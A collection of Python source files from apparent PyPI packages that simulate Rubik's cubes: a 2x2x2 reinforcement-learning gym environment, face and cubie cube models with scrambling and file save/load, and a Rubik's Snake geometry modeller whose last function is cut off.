side_cubies_old = np.array([14, 15, 12, 13, 18, 19, 16, 17])
face_cubies_old = np.array([[20, 21], [22, 23]])
side_cubies_new = np.roll(side_cubies_old, -2 * repetitions)
face_cubies_new = np.rot90(face_cubies_old, 4 - repetitions).flatten()
face_cubies_old = face_cubies_old.flatten()
np.put(self.cube, side_cubies_old, self.cube[side_cubies_new])
np.put(self.cube, face_cubies_old, self.cube[face_cubies_new])
def algorithm(self, moves):
for move in moves.split(" "):
if len(move) == 2:
self.move(move[0], move[1])
else:
self.move(move[0])
def step(self, action):
move = ACTION_MAP[action]
self.move(move[0], move[1])
self.update_cube_reduced()
self.update_cube_state()
reward, done = self.reward()
observation = self.cube_state
info = {"cube": self.cube, "cube_reduced": self.cube_reduced}
return observation, reward, done, info
def reward(self):
if self.cube_reduced == "WWWWOOGGRRBBOOGGRRBBYYYY":
return 100, True
else:
return -1, False
def reset(self, scramble=None):
self.cube = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23],
dtype=np.uint8)
if scramble:
self.algorithm(scramble)
elif scramble == False:
pass
else:
self.algorithm(self.generate_scramble())
self.update_cube_reduced()
self.update_cube_state()
return self.cube_state
def render(self, mode='human', render_time=100):
if mode == 'ansi':
return self.cube_reduced
else:
cube_to_render = [[0] * 2 + [1] * 2 + [0] * 4] * 2 + [[1] * 8] * 2 + [[0] * 2 + [1] * 2 + [0] * 4] * 2
render_array = np.zeros((6, 8, 3), dtype=np.uint8)
ctr = 0
for row in range(6):
for col in range(8):
if cube_to_render[row][col] == 1:
render_array[row][col] = COLOR_MAP[TILE_MAP[self.cube[ctr]]]
ctr += 1
if mode == 'rgb_array':
return render_array
elif mode == "human":
img = cv2.cvtColor(render_array, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, (300, 225), interpolation=cv2.INTER_NEAREST)
cv2.imshow("Cube", np.array(img))
cv2.waitKey(render_time)
def close(self):
del self.cube_states
gc.collect()
cv2.destroyAllWindows()
TILE_MAP = {
0: 'W', 1: 'W', 2: 'W', 3: 'W',
4: 'O', 5: 'O', 6: 'G', 7: 'G', 8: 'R', 9: 'R', 10: 'B', 11: 'B',
12: 'O', 13: 'O', 14: 'G', 15: 'G', 16: 'R', 17: 'R', 18: 'B', 19: 'B',
20: 'Y', 21: 'Y', 22: 'Y', 23: 'Y'
}
COLOR_MAP = {
'W': (255, 255, 255),
'O': (255, 165, 0),
'G': (0, 128, 0),
'R': (255, 0, 0),
'B': (0, 0, 255),
'Y': (255, 255, 0)
}
ACTION_MAP = {0: ("F", None), 1: ("R", None), 2: ("U", None)} | /rubiks_cube_gym-0.4.0.tar.gz/rubiks_cube_gym-0.4.0/rubiks_cube_gym/envs/rubiks_cube_222.py | 0.497559 | 0.221372 | rubiks_cube_222.py | pypi |
import numpy as np
from utils import matrix_ref, pieces_ref, bin_to_color
from rubiks_cube.face_cube import FaceCube
from rubiks_cube.cubie_cube import CubieCube
class Cube:
"""
Implements a 3x3x3 Rubiks Cube.
"""
def __init__(self):
self.face_cube = FaceCube()
self.cubie_cube = CubieCube()
def turn_face(self, face, way=0):
"""
Makes a turn on the cube.
:param face: Face to turn (Should be one of [U, R, B, D, F, L]).
:param way: 0 to clockwise turn, 1 to counterclockwise turn, 2 to double turn.
:return: No return, the cube gets turned inplace.
"""
self.face_cube.turn_face(face, way)
self.cubie_cube.turn_face(face, way)
def is_solved(self):
"""
Checks if cube is solved.
:return: True for solved and False for not solved.
"""
return self.face_cube.is_solved()
def n_colors_in_place(self):
"""
Counts how many colors are in the correct place.
:return: Number of colors in the correct place.
"""
return self.face_cube.n_colors_in_place()
def n_pieces_in_place(self):
"""
Counts how many pieces are in the correct place.
:return: Number of pieces in the correct place.
"""
return self.cubie_cube.n_pieces_in_place()
def print(self):
"""
Prints the state of the rubiks cube.
:return: None.
"""
self.face_cube.print()
def scramble(self, scramble):
"""
Scrambles the cube.
:param scramble: String in official scramble notation.
:return: None, the cube scrambles inplace.
"""
if scramble is not None and not scramble == "":
self.face_cube.scramble(scramble)
self.cubie_cube.scramble(scramble)
def get_color_matrix(self):
"""
Returns color matrix.
:return: Color Matrix
"""
return self.face_cube.get_color_matrix()
def set_cube(self, setter):
if type(setter) is tuple:
self.face_cube.set_color_matrix(setter[0])
self.cubie_cube.set_pieces(setter[1])
elif isinstance(setter, np.ndarray):
if setter.shape == matrix_ref.shape:
self.face_cube.set_color_matrix(setter)
self.cubie_cube.set_pieces_from_matrix(setter)
elif setter.shape == pieces_ref.shape:
self.face_cube.set_matrix_from_pieces(setter)
self.cubie_cube.set_pieces(setter)
else:
print("Error: Format to set cube unknown")
else:
print("Error: Format to set cube unknown")
def get_pieces(self):
"""
Returns pieces.
:return: Pieces
"""
return self.cubie_cube.get_pieces()
def get_binary_array(self, one_hot=False):
"""
Returns the color matrix as a binary array for whatever purpose you`d like.
:param one_hot: True if you want it to be onehot encoded.
:return: Binary color matrix.
"""
return self.face_cube.get_binary_array(one_hot)
def get_corners_orientation(self):
return self.cubie_cube.get_corners_orientation()
def get_edges_orientation(self):
return self.cubie_cube.get_edges_orientation()
def save_cube(self, path):
file = open(path, "wb")
bin_to_save = "".join(self.get_binary_array().astype(str))
bin_to_save = bin_to_save
bin_to_save = int(bin_to_save[::-1], base=2).to_bytes(32, "little")
file.write(bin_to_save)
def load_cube(self, path):
file = open(path, "rb")
binary_array = file.read()
binary_array = np.array(list("{:0<144}".format(format(int.from_bytes(binary_array, "little"), "032b")[::-1])))
binary_array = binary_array.reshape(-1, 3).astype(int)
load_matrix = matrix_ref.copy()
for i in range(6):
for j in range(1, 9):
load_matrix[i][j] = bin_to_color[tuple(binary_array[i*8+(j-1)])]
self.set_cube(load_matrix) | /rubiks_cube-1.0.7.tar.gz/rubiks_cube-1.0.7/rubiks_cube/rubiks_cube.py | 0.764804 | 0.374362 | rubiks_cube.py | pypi |
import numpy as np
from utils import matrix_ref, int_face, notation, swap4, colors, corners
class FaceCube:
def __init__(self):
self.color_matrix = matrix_ref.copy()
def swap(self, to_swap, way):
(self.color_matrix[to_swap[0]], self.color_matrix[to_swap[1]],
self.color_matrix[to_swap[2]], self.color_matrix[to_swap[3]]) = \
swap4(self.color_matrix[to_swap[0]].copy(), self.color_matrix[to_swap[1]].copy(),
self.color_matrix[to_swap[2]].copy(), self.color_matrix[to_swap[3]].copy(),
way)
def turn_face(self, face, way=0):
turn = int_face[face]
# Turn edge facelets in the turning face
self.swap([(turn, 1), (turn, 2), (turn, 3), (turn, 4)], way)
self.swap([(turn, 5), (turn, 6), (turn, 7), (turn, 8)], way)
# UP
if turn == 0:
lateral_edges_to_swap = [(1, 3), (2, 4), (4, 1), (5, 2)]
lateral_corners_to_swap_1 = [(1, 7), (2, 8), (4, 5), (5, 6)]
lateral_corners_to_swap_2 = [(1, 8), (2, 5), (4, 6), (5, 7)]
# FRONT
elif turn == 1:
lateral_edges_to_swap = [(3, 1), (2, 1), (0, 1), (5, 1)]
lateral_corners_to_swap_1 = [(3, 5), (2, 5), (0, 5), (5, 5)]
lateral_corners_to_swap_2 = [(3, 6), (2, 6), (0, 6), (5, 6)]
# RIGHT
elif turn == 2:
lateral_edges_to_swap = [(0, 2), (1, 2), (3, 4), (4, 2)]
lateral_corners_to_swap_1 = [(0, 6), (1, 6), (3, 8), (4, 6)]
lateral_corners_to_swap_2 = [(0, 7), (1, 7), (3, 5), (4, 7)]
# DOWN
elif turn == 3:
lateral_edges_to_swap = [(1, 1), (5, 4), (4, 3), (2, 2)]
lateral_corners_to_swap_1 = [(5, 8), (4, 7), (2, 6), (1, 5)]
lateral_corners_to_swap_2 = [(5, 5), (4, 8), (2, 7), (1, 6)]
# BACK
elif turn == 4:
lateral_edges_to_swap = [(0, 3), (2, 3), (3, 3), (5, 3)]
lateral_corners_to_swap_1 = [(0, 8), (2, 8), (3, 8), (5, 8)]
lateral_corners_to_swap_2 = [(0, 7), (2, 7), (3, 7), (5, 7)]
# LEFT
elif turn == 5:
lateral_edges_to_swap = [(0, 4), (4, 4), (3, 2), (1, 4)]
lateral_corners_to_swap_1 = [(1, 8), (0, 8), (4, 8), (3, 6)]
lateral_corners_to_swap_2 = [(1, 5), (0, 5), (4, 5), (3, 7)]
else:
print("Error: Invalid face to turn")
return
# Turn edge facelets in the lateral faces
self.swap(lateral_edges_to_swap, way)
# Turn corner facelets in the lateral faces part 1
self.swap(lateral_corners_to_swap_1, way)
# Turn corner facelets in the lateral faces part 2
self.swap(lateral_corners_to_swap_2, way)
def is_solved(self):
return np.array_equal(self.color_matrix, matrix_ref)
def n_colors_in_place(self):
return np.sum(self.color_matrix == matrix_ref)
def print(self):
print("rubiks_cube: \n")
print(" {0} {1} {2}".format(self.color_matrix[4, 8], self.color_matrix[4, 3], self.color_matrix[4, 7]))
print(" {0} {1} {2}".format(self.color_matrix[4, 4], self.color_matrix[4, 0], self.color_matrix[4, 2]))
print(" {0} {1} {2}".format(self.color_matrix[4, 5], self.color_matrix[4, 1], self.color_matrix[4, 6]))
print(" -----")
print("{0} {1} {2}|{3} {4} {5}|{6} {7} {8}|{9} {10} {11}"
.format(self.color_matrix[5, 8], self.color_matrix[5, 3], self.color_matrix[5, 7],
self.color_matrix[0, 8], self.color_matrix[0, 3], self.color_matrix[0, 7],
self.color_matrix[2, 8], self.color_matrix[2, 3], self.color_matrix[2, 7],
self.color_matrix[3, 8], self.color_matrix[3, 3], self.color_matrix[3, 7]))
print("{0} {1} {2}|{3} {4} {5}|{6} {7} {8}|{9} {10} {11}"
.format(self.color_matrix[5, 4], self.color_matrix[5, 0], self.color_matrix[5, 2],
self.color_matrix[0, 4], self.color_matrix[0, 0], self.color_matrix[0, 2],
self.color_matrix[2, 4], self.color_matrix[2, 0], self.color_matrix[2, 2],
self.color_matrix[3, 4], self.color_matrix[3, 0], self.color_matrix[3, 2]))
print("{0} {1} {2}|{3} {4} {5}|{6} {7} {8}|{9} {10} {11}"
.format(self.color_matrix[5, 5], self.color_matrix[5, 1], self.color_matrix[5, 6],
self.color_matrix[0, 5], self.color_matrix[0, 1], self.color_matrix[0, 6],
self.color_matrix[2, 5], self.color_matrix[2, 1], self.color_matrix[2, 6],
self.color_matrix[3, 5], self.color_matrix[3, 1], self.color_matrix[3, 6]))
print(" -----")
print(" {0} {1} {2}".format(self.color_matrix[1, 8], self.color_matrix[1, 3], self.color_matrix[1, 7]))
print(" {0} {1} {2}".format(self.color_matrix[1, 4], self.color_matrix[1, 0], self.color_matrix[1, 2]))
print(" {0} {1} {2}".format(self.color_matrix[1, 5], self.color_matrix[1, 1], self.color_matrix[1, 6]))
print()
def scramble(self, scramble):
turns = [notation[turn] for turn in scramble.split()]
for turn in turns:
self.turn_face(turn[0], turn[1])
def assert_valid_matrix(self):
count_colors = {"color_U": 0, "color_F": 0, "color_R": 0, "color_D": 0, "color_B": 0, "color_L": 0}
for face in self.color_matrix:
for facelet in face:
if facelet not in colors:
print("Invalid Matrix")
return
elif facelet == colors[0]:
count_colors["color_U"] += 1
elif facelet == colors[1]:
count_colors["color_F"] += 1
elif facelet == colors[2]:
count_colors["color_R"] += 1
elif facelet == colors[3]:
count_colors["color_D"] += 1
elif facelet == colors[4]:
count_colors["color_B"] += 1
elif facelet == colors[5]:
count_colors["color_L"] += 1
for counted in count_colors.values():
if counted != 9:
print("Invalid Matrix")
return
def get_color_matrix(self):
return self.color_matrix
def set_color_matrix(self, matrix):
self.color_matrix = matrix
def get_binary_array(self, one_hot=False):
if one_hot:
binary_array = np.zeros(288).astype(int)
for i in range(6):
for j in range(1, 9):
if self.color_matrix[i][j] == colors[0]:
binary_array[(j - 1) * 6 + i * 48] = 1
elif self.color_matrix[i][j] == colors[1]:
binary_array[(j - 1) * 6 + 1 + i * 48] = 1
elif self.color_matrix[i][j] == colors[2]:
binary_array[(j - 1) * 6 + 2 + i * 48] = 1
elif self.color_matrix[i][j] == colors[3]:
binary_array[(j - 1) * 6 + 3 + i * 48] = 1
elif self.color_matrix[i][j] == colors[4]:
binary_array[(j - 1) * 6 + 4 + i * 48] = 1
elif self.color_matrix[i][j] == colors[5]:
binary_array[(j - 1) * 6 + 5 + i * 48] = 1
else:
binary_array = np.zeros(144).astype(int)
for i in range(6):
for j in range(1, 9):
if self.color_matrix[i][j] == colors[1]:
binary_array[(j - 1) * 3 + 1 + i * 24] = 1
elif self.color_matrix[i][j] == colors[2]:
binary_array[(j - 1) * 3 + 1 + i * 24] = 1
binary_array[(j - 1) * 3 + 2 + i * 24] = 1
elif self.color_matrix[i][j] == colors[3]:
binary_array[(j - 1) * 3 + i * 24] = 1
elif self.color_matrix[i][j] == colors[4]:
binary_array[(j - 1) * 3 + i * 24] = 1
binary_array[(j - 1) * 3 + 2 + i * 24] = 1
elif self.color_matrix[i][j] == colors[5]:
binary_array[(j - 1) * 3 + i * 24] = 1
binary_array[(j - 1) * 3 + 1 + i * 24] = 1
return binary_array
def set_corner(self, facelets, piece, position):
type1_corners = [corners[0], corners[2], corners[5], corners[7]]
type1_positions = [0, 2, 5, 7]
if (piece[0] in type1_corners and position in type1_positions) or \
(piece[0] not in type1_corners and position not in type1_positions):
if piece[1] == 0:
self.color_matrix[facelets[0]] = piece[0][0]
self.color_matrix[facelets[1]] = piece[0][1]
self.color_matrix[facelets[2]] = piece[0][2]
elif piece[1] == 1:
self.color_matrix[facelets[1]] = piece[0][0]
self.color_matrix[facelets[2]] = piece[0][1]
self.color_matrix[facelets[0]] = piece[0][2]
else:
self.color_matrix[facelets[2]] = piece[0][0]
self.color_matrix[facelets[0]] = piece[0][1]
self.color_matrix[facelets[1]] = piece[0][2]
else:
if piece[1] == 0:
self.color_matrix[facelets[0]] = piece[0][0]
self.color_matrix[facelets[2]] = piece[0][1]
self.color_matrix[facelets[1]] = piece[0][2]
elif piece[1] == 1:
self.color_matrix[facelets[1]] = piece[0][0]
self.color_matrix[facelets[0]] = piece[0][1]
self.color_matrix[facelets[2]] = piece[0][2]
else:
self.color_matrix[facelets[2]] = piece[0][0]
self.color_matrix[facelets[1]] = piece[0][1]
self.color_matrix[facelets[0]] = piece[0][2]
def set_edge(self, facelets, piece):
if piece[1] == 0:
self.color_matrix[facelets[0]] = piece[0][0]
self.color_matrix[facelets[1]] = piece[0][1]
else:
self.color_matrix[facelets[0]] = piece[0][1]
self.color_matrix[facelets[1]] = piece[0][0]
def set_matrix_from_pieces(self, pieces):
# Set from edges
self.set_edge([(0, 1), (1, 3)], pieces[0]) # UF
self.set_edge([(0, 2), (2, 4)], pieces[1]) # UR
self.set_edge([(0, 3), (4, 1)], pieces[2]) # UB
self.set_edge([(0, 4), (5, 2)], pieces[3]) # UL
self.set_edge([(1, 4), (5, 1)], pieces[4]) # FL
self.set_edge([(1, 2), (2, 1)], pieces[5]) # FR
self.set_edge([(4, 2), (2, 3)], pieces[6]) # BR
self.set_edge([(4, 4), (5, 3)], pieces[7]) # BL
self.set_edge([(3, 1), (1, 1)], pieces[8]) # DF
self.set_edge([(3, 4), (2, 2)], pieces[9]) # DR
self.set_edge([(3, 3), (4, 3)], pieces[10]) # DB
self.set_edge([(3, 2), (5, 4)], pieces[11]) # DL
# Set from corners
self.set_corner([(0, 5), (1, 8), (5, 6)], pieces[12], 0) # UFL
self.set_corner([(0, 6), (1, 7), (2, 5)], pieces[13], 1) # UFR
self.set_corner([(0, 7), (4, 6), (2, 8)], pieces[14], 2) # UBR
self.set_corner([(0, 8), (4, 5), (5, 7)], pieces[15], 3) # UBL
self.set_corner([(3, 6), (1, 5), (5, 5)], pieces[16], 4) # DFL
self.set_corner([(3, 5), (1, 6), (2, 6)], pieces[17], 5) # DFR
self.set_corner([(3, 8), (4, 7), (2, 7)], pieces[18], 6) # DBR
self.set_corner([(3, 7), (4, 8), (5, 8)], pieces[19], 7) # DBL | /rubiks_cube-1.0.7.tar.gz/rubiks_cube-1.0.7/rubiks_cube/face_cube.py | 0.521959 | 0.633708 | face_cube.py | pypi |
import numpy as np
from utils import pieces_ref, int_face, notation, swap4, colors
class CubieCube:
def __init__(self):
self.pieces = pieces_ref.copy()
def swap(self, to_swap, way):
self.pieces[to_swap[0]], self.pieces[to_swap[1]], self.pieces[to_swap[2]], self.pieces[to_swap[3]] = \
swap4(self.pieces[to_swap[0]].copy(), self.pieces[to_swap[1]].copy(),
self.pieces[to_swap[2]].copy(), self.pieces[to_swap[3]].copy(),
way)
def corner_turn(self, turn, corners_to_swap, way):
if way != 2:
for corner in corners_to_swap:
if turn == 0 or turn == 3:
# U or D
if self.pieces[corner][1] == 2:
self.pieces[corner][1] = 1
elif self.pieces[corner][1] == 1:
self.pieces[corner][1] = 2
if turn == 1 or turn == 4:
# F or B
if self.pieces[corner][1] == 2:
self.pieces[corner][1] = 0
elif self.pieces[corner][1] == 0:
self.pieces[corner][1] = 2
if turn == 2 or turn == 5:
# R or L
if self.pieces[corner][1] == 1:
self.pieces[corner][1] = 0
elif self.pieces[corner][1] == 0:
self.pieces[corner][1] = 1
self.swap(corners_to_swap, way)
def edges_turn(self, turn, edges_to_swap, way):
if way != 2:
for edge in edges_to_swap:
if turn == 1 or turn == 4:
# F or B
if self.pieces[edge][1] == 1:
self.pieces[edge][1] = 0
elif self.pieces[edge][1] == 0:
self.pieces[edge][1] = 1
self.swap(edges_to_swap, way)
def turn_face(self, face, way=0):
"""
Makes a turn on the cube.
:param face: Face to turn (Should be one of [U, R, B, D, F, L]).
:param way: 0 to clockwise turn, 1 to counterclockwise turn, 2 to double turn.
:return: No return, the cube gets turned inplace.
"""
turn = int_face[face]
# UP
if turn == 0:
edges_to_swap = [0, 1, 2, 3]
corners_to_swap = [12, 13, 14, 15]
# FRONT
elif turn == 1:
edges_to_swap = [8, 5, 0, 4]
corners_to_swap = [16, 17, 13, 12]
# RIGHT
elif turn == 2:
edges_to_swap = [1, 5, 9, 6]
corners_to_swap = [17, 18, 14, 13]
# DOWN
elif turn == 3:
edges_to_swap = [11, 10, 9, 8]
corners_to_swap = [19, 18, 17, 16]
# BACK
elif turn == 4:
edges_to_swap = [2, 6, 10, 7]
corners_to_swap = [15, 14, 18, 19]
# LEFT
elif turn == 5:
edges_to_swap = [3, 7, 11, 4]
corners_to_swap = [12, 15, 19, 16]
else:
print("Error: Invalid face to turn")
return
self.corner_turn(turn, corners_to_swap, way)
self.edges_turn(turn, edges_to_swap, way)
def n_pieces_in_place(self):
"""
Counts how many pieces are in the correct place.
:return: Number of pieces in the correct place.
"""
return sum(np.all(self.pieces == pieces_ref, axis=1))
def print(self):
"""
Prints the state of the rubiks cube.
:return: None.
"""
for piece in self.pieces:
print(piece)
def scramble(self, scramble):
"""
Scrambles the cube.
:param scramble: String in official scramble notation.
:return: None, the cube scrambles inplace.
"""
turns = [notation[turn] for turn in scramble.split()]
for turn in turns:
self.turn_face(turn[0], turn[1])
def get_pieces(self):
"""
Returns pieces.
:return: Pieces
"""
return self.pieces
def set_pieces(self, pieces):
"""
Sets pieces (Doesn't check if the pieces are a valid cube,
if it isn`t you might run into problems if you want it to be solvable."
:param pieces: Pieces in the standard format
:return: None
"""
self.pieces = pieces
def get_corners_orientation(self):
return self.pieces[12:, 1]
def get_edges_orientation(self):
return self.pieces[:12, 1]
def set_edge(self, matrix, facelets, piece_num):
if matrix[facelets[0]] == colors[0] or matrix[facelets[1]] == colors[0] or \
matrix[facelets[0]] == colors[3] or matrix[facelets[1]] == colors[3]:
if matrix[facelets[0]] == colors[0] or matrix[facelets[0]] == colors[3]:
self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[1]]
self.pieces[piece_num][1] = 0
else:
self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[0]]
self.pieces[piece_num][1] = 1
else:
if matrix[facelets[0]] == colors[1] or matrix[facelets[0]] == colors[4]:
self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[1]]
self.pieces[piece_num][1] = 0
else:
self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[0]]
self.pieces[piece_num][1] = 1
def set_corner(self, matrix, facelets, piece_num):
print(matrix[facelets[0]] + matrix[facelets[1]] + matrix[facelets[2]])
if matrix[facelets[0]] == colors[0] or matrix[facelets[0]] == colors[3]:
self.pieces[piece_num][1] = 0
if matrix[facelets[1]] == colors[1] or matrix[facelets[1]] == colors[4]:
self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[1]] + matrix[facelets[2]]
else:
self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[2]] + matrix[facelets[1]]
elif matrix[facelets[1]] == colors[0] or matrix[facelets[1]] == colors[3]:
self.pieces[piece_num][1] = 1
if matrix[facelets[0]] == colors[1] or matrix[facelets[0]] == colors[4]:
self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[0]] + matrix[facelets[2]]
else:
self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[2]] + matrix[facelets[0]]
else:
self.pieces[piece_num][1] = 2
if matrix[facelets[0]] == colors[1] or matrix[facelets[0]] == colors[4]:
self.pieces[piece_num][0] = matrix[facelets[2]] + matrix[facelets[0]] + matrix[facelets[1]]
else:
self.pieces[piece_num][0] = matrix[facelets[2]] + matrix[facelets[1]] + matrix[facelets[0]]
def set_pieces_from_matrix(self, matrix):
# Set edges
self.set_edge(matrix, [(0, 1), (1, 3)], 0) # UF
self.set_edge(matrix, [(0, 2), (2, 4)], 1) # UR
self.set_edge(matrix, [(0, 3), (4, 1)], 2) # UB
self.set_edge(matrix, [(0, 4), (5, 2)], 3) # UL
self.set_edge(matrix, [(1, 4), (5, 1)], 4) # FL
self.set_edge(matrix, [(1, 2), (2, 1)], 5) # FR
self.set_edge(matrix, [(4, 2), (2, 3)], 6) # BR
self.set_edge(matrix, [(4, 4), (5, 3)], 7) # BL
self.set_edge(matrix, [(3, 1), (1, 1)], 8) # DF
self.set_edge(matrix, [(3, 4), (2, 2)], 9) # DR
self.set_edge(matrix, [(3, 3), (4, 3)], 10) # DB
self.set_edge(matrix, [(3, 2), (5, 4)], 11) # DL
# Set corners
self.set_corner(matrix, [(0, 5), (1, 8), (5, 6)], 12) # UFL
self.set_corner(matrix, [(0, 6), (1, 7), (2, 5)], 13) # UFR
self.set_corner(matrix, [(0, 7), (4, 6), (2, 8)], 14) # UBR
self.set_corner(matrix, [(0, 8), (4, 5), (5, 7)], 15) # UBL
self.set_corner(matrix, [(3, 6), (1, 5), (5, 5)], 16) # DFL
self.set_corner(matrix, [(3, 5), (1, 6), (2, 6)], 17) # DFR
self.set_corner(matrix, [(3, 8), (4, 7), (2, 7)], 18) # DBR
self.set_corner(matrix, [(3, 7), (4, 8), (5, 8)], 19) # DBL | /rubiks_cube-1.0.7.tar.gz/rubiks_cube-1.0.7/rubiks_cube/cubie_cube.py | 0.667039 | 0.538983 | cubie_cube.py | pypi |
import re
import numpy as np
from itertools import product, combinations
def cosine(u, v):
'''Pure NumPy analog of scipy.spatial.distance.cosine'''
return 1 - np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))
class RubiksSnake:
POINTS_PER_UNIT = 6
TRIANGLES_PER_UNIT = 4
DEFAULT_COLORS = [
[0, 'blue'],
[1, 'white'],
]
def __init__(self, n_segments=24, color_scale=DEFAULT_COLORS, segment_colors=None, initial_state=None):
'''
Class for modeling, visualizing and studying the Rubik's Snake
'''
self.n_segments = n_segments
self.state = np.zeros(n_segments - 1, dtype=np.uint8)
self.conformation = np.zeros((n_segments, 6, 3), dtype=np.int16)
self.color_scale = color_scale
if segment_colors is None:
self.colors = np.tile([0,1], n_segments // 2)[:n_segments]
else:
self.colors = np.array(segment_colors)
if initial_state is None:
self.compute_conformation()
else:
self.assemble_by_formula(initial_state)
def interference_check(self):
cells = self.conformation.min(axis=1)
lower_bounds = cells.min(axis=0)
grid_shape = cells.max(axis=0) - lower_bounds + 1
grid = -np.ones(grid_shape, dtype=np.int16)
interference_candidates = {}
for i in range(cells.shape[0]):
x, y, z = cells[i] - lower_bounds
if grid[x, y, z] >= 0:
interference_candidates[(x, y, z)] = interference_candidates.get((x, y, z), [grid[x, y, z]]) + [i]
else:
grid[x, y, z] = i
interferences = []
for points in interference_candidates.values():
if len(points) > 2:
interferences.append(points)
continue
a, b = points
p2a, p3a = self.conformation[a, [2,3]]
p2b, p3b = self.conformation[b, [2,3]]
ridge_a, ridge_b = p3a - p2a, p3b - p2b
is_collinear = (ridge_a == ridge_b).all()
is_anticollinear = (ridge_a == -ridge_b).all()
if not (is_collinear or is_anticollinear):
interferences.append(points)
continue
if ((is_collinear and np.abs(p2a - p2b).sum() < 2)
or (is_anticollinear and np.abs(p2a - p3b).sum() < 2)):
interferences.append(points)
self.interferences = interferences
return bool(interferences)
def assemble_by_formula(self, formula):
formula_unit = re.compile(r'(\d+)([RL])(\d)')
formula_parsed = [formula_unit.match(unit).groups() for unit in formula.split('-')]
for segment, side, rotation in formula_parsed:
segment, rotation = map(int, (segment, rotation))
i = (segment - 1) * 2
if side == 'R':
self.state[i] = rotation
elif side == 'L':
self.state[i-1] = -rotation % 4
self.compute_conformation()
def compute_conformation(self):
self.conformation[0] = [
[0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1],
[1, 0, 0],
[1, 1, 0],
]
for i in range(self.n_segments - 1):
p0, p1, p2, p3, p4, p5 = self.conformation[i] # prev state
offset = p2 - p4
if self.state[i] == 0:
self.conformation[i+1] = [
p1 + offset,
p0 + offset,
p1,
p0,
p3,
p2,
]
elif self.state[i] == 1:
self.conformation[i+1] = [
p3 + offset,
p1 + offset,
p3,
p1,
p2,
p0,
]
elif self.state[i] == 2:
self.conformation[i+1] = [
p2 + offset,
p3 + offset,
p2,
p3,
p0,
p1,
]
elif self.state[i] == 3:
self.conformation[i+1] = [
p0 + offset,
p2 + offset,
p0,
p2,
p1,
p3,
]
else:
raise Exception
if self.interference_check():
print(f'WARNING! Self-intersection detected between segments {self.interferences}')
def get_triangulation(self):
triangles_per_unit = self.TRIANGLES_PER_UNIT
points_per_unit = self.POINTS_PER_UNIT
unit_triangles = np.array([
[0, 2, 4],
[1, 3, 5],
[0, 1, 4],
[1, 4, 5],
], dtype=np.uint16)
unit_cap_start = np.array([
[2, 3, 4],
[3, 4, 5],
], dtype=np.uint16)
unit_cap_end = np.array([
[0, 1, 2],
[1, 2, 3],
], dtype=np.uint16)
assert unit_triangles.shape[0] == triangles_per_unit
triangles = []
for i in range(self.n_segments):
triangles.append(unit_triangles + i*points_per_unit)
triangles.append(unit_cap_start)
triangles.append(unit_cap_end + i*points_per_unit)
return self.conformation.reshape(-1,3), np.vstack(triangles)
def get_intersecting_volume(self, i, j):
def get_plane_norm(unit):
p0, p1, p2, p3, p4, p5 = unit.astype(np.float64)
ridge = p3 - p2
visor = p4 - p0
plane_norm = np.cross(ridge, visor)
return plane_norm
def get_horns(unit):
p0, p1, p2, p3, p4, p5 = unit.astype(np.float64)
ridge = p3 - p2
slope_1, slope_2 = p0 - p2, p2 - p4
return np.cross(ridge, slope_1), np.cross(ridge, slope_2)
norm_i, norm_j = get_plane_norm(self.conformation[i]), get_plane_norm(self.conformation[j])
interference_type = cosine(norm_i, norm_j)
if np.isclose(interference_type, 0.0): # full match cos_nn = 0
intersection = self.conformation[i]
unit_triangles = np.array([
[0, 2, 4],
[1, 3, 5],
[0, 1, 4],
[1, 4, 5],
[0, 1, 2],
[1, 2, 3],
[2, 3, 4],
[3, 4, 5],
], dtype=np.uint16)
edge_bypass = [0, 1, 3, 2, 0, 4, 5, 1, 3, 5, 4, 2]
edges = intersection[edge_bypass]
elif np.isclose(interference_type, 0.5): # big prism cos_nn = 0.5
horns_i = get_horns(self.conformation[i])
horns_j = get_horns(self.conformation[j])
for n, m in product((0, 1), (0, 1)):
if np.isclose(cosine(horns_i[n], horns_j[m]), 0):
break
if n == 0:
bottom = self.conformation[i, :4]
p4i, p5i = self.conformation[i, 4:]
if m == 0:
p4j, p5j = self.conformation[j, 4:]
vertex = p4i if np.isclose(p4i, p5j).all() else p5i
else:
p0j, p1j = self.conformation[j, :2]
vertex = p4i if np.isclose(p4i, p0j).all() else p5i
else:
bottom = self.conformation[i, 2:]
p0i, p1i = self.conformation[i, :2]
if m == 0:
p4j, p5j = self.conformation[j, 4:]
vertex = p0i if np.isclose(p0i, p5j).all() else p1i
else:
p0j, p1j = self.conformation[j, :2]
vertex = p0i if np.isclose(p0i, p1j).all() else p1i
(p0, p1, p2, p3), p4 = bottom, vertex
intersection = np.vstack((p0, p1, p2, p3, p4))
unit_triangles = np.array([
[0, 1, 2],
[1, 2, 3],
[0, 1, 4],
[1, 3, 4],
[2, 3, 4],
[0, 2, 4],
], dtype=np.uint16)
edge_bypass = [0, 1, 3, 2, 0, 4, 2, 3, 4, 1]
edges = intersection[edge_bypass]
elif np.isclose(interference_type, 1.0): # "roof" (extra points required) cos_nn = 1
vert_1 = self.conformation[i, 2] + norm_i/2
vert_2 = self.conformation[i, 3] + norm_i/2
horns_i = get_horns(self.conformation[i])
horns_j = get_horns(self.conformation[j])
for n, m in product((0, 1), (0, 1)):
if np.isclose(cosine(horns_i[n], horns_j[m]), 0):
break
if n == 0:
bottom = self.conformation[i, :4]
else:
bottom = self.conformation[i, 2:]
(p0, p1, p2, p3), p4, p5 = bottom, vert_1, vert_2
intersection = np.vstack((p0, p1, p2, p3, p4, p5))
unit_triangles = np.array([
[0, 2, 4],
[1, 3, 5],
[0, 1, 4],
[1, 4, 5],
[0, 1, 2],
[1, 2, 3],
[2, 3, 4],
[3, 4, 5],
], dtype=np.uint16)
edge_bypass = [0, 1, 3, 2, 0, 4, 5, 1, 3, 5, 4, 2]
edges = intersection[edge_bypass]
